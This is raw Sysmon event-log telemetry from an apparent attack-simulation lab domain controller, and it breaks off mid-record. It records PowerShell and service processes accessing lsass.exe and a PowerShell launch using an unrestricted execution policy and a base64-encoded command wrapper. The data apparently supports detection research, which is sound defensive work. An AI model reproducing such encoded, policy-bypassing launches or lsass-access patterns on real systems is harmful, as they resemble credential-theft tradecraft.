15:50:20.076{D28789B6-7ACF-5FA1-0B00-000000008701}860916C:\Windows\system32\lsass.exe{D28789B6-7C3B-5FA1-F402-000000008701}5084C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x8000000000000000110Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:20.029{D28789B6-7C3B-5FA1-F402-000000008701}5084C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_4v0js4wl.3a3.ps12020-11-03 15:50:20.029 10341000x8000000000000000109Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:20.013{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3B-5FA1-F402-000000008701}5084C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000254Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:21.685{D28789B6-7C3D-5FA1-F902-000000008701}38444216C:\Windows\system32\conhost.exe{D28789B6-7C3D-5FA1-FD02-000000008701}1756C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000253Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:21.685{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000252Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:21.685{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000251Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:21.685{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000250Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:21.685{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000249Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:21.685{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000248Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:21.685{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000247Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:21.685{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000246Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:21.669{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000245Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:21.669{D28789B6-7AC1-5FA1-0500-000000008701}636652C:\Windows\system32\csrss.exe{D28789B6-7C3D-5FA1-FD02-000000008701}1756C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000244Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:21.669{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000243Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:21.669{D28789B6-7C3D-5FA1-FC02-000000008701}47202492C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7C3D-5FA1-FD02-000000008701}1756C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+3b2fe28b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+3a79f115|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+3a79ede6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+3b25044b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+3a75f97c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+3a7bde4b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+3a7a14b0|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+3a7a14b0|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+3a7a1341|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+3a7932c6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+3a79f7f9|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+3a79f3ec|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+3a79f115|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+3a79ede6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+3b25044b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+3a785c47|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+3a785217 154100x8000000000000000242Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:21.684{D28789B6-7C3D-5FA1-FD02-000000008701}1756C:\Windows\System32\chcp.com10.0.14393.0 (rs1_release.160715-1616)Change CodePage UtilityMicrosoft® Windows® Operating SystemMicrosoft CorporationCHCP.COM"C:\Windows\system32\chcp.com" 65001C:\Users\Administrator\ATTACKRANGE\Administrator{D28789B6-7C3D-5FA1-E3BE-100000000000}0x10bee30HighMD5=BA6FD5B883C0899785D17CEBE66A25F6,SHA256=9FDBDF88CF2BB2794C416E3083553F2898AC9DC92DFAC2478B4C1DF667DF7C74,IMPHASH=4FB30D6E330F3FB3DB61550BD7FA7CCD{D28789B6-7C3D-5FA1-FC02-000000008701}4720C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA== 10341000x8000000000000000241Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:21.669{D28789B6-7ACF-5FA1-0B00-000000008701}860588C:\Windows\system32\lsass.exe{D28789B6-7AD2-5FA1-1400-000000008701}1368C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000240Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:21.669{D28789B6-7ACF-5FA1-0B00-000000008701}860588C:\Windows\system32\lsass.exe{D28789B6-7AD2-5FA1-1400-000000008701}1368C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000239Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:21.654{D28789B6-7ACF-5FA1-0B00-000000008701}860588C:\Windows\system32\lsass.exe{D28789B6-7AD2-5FA1-1400-000000008701}1368C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000238Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:21.607{D28789B6-7ACF-5FA1-0B00-000000008701}860588C:\Windows\system32\lsass.exe{D28789B6-7C3D-5FA1-FC02-000000008701}4720C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000237Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:21.607{D28789B6-7ACF-5FA1-0B00-000000008701}860588C:\Windows\system32\lsass.exe{D28789B6-7C3D-5FA1-FC02-000000008701}4720C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x8000000000000000236Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:21.560{D28789B6-7C3D-5FA1-FC02-000000008701}4720C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_yjrrtblj.u00.ps12020-11-03 15:50:21.560 10341000x8000000000000000235Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:21.544{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C3D-5FA1-FC02-000000008701}4720C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000234Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 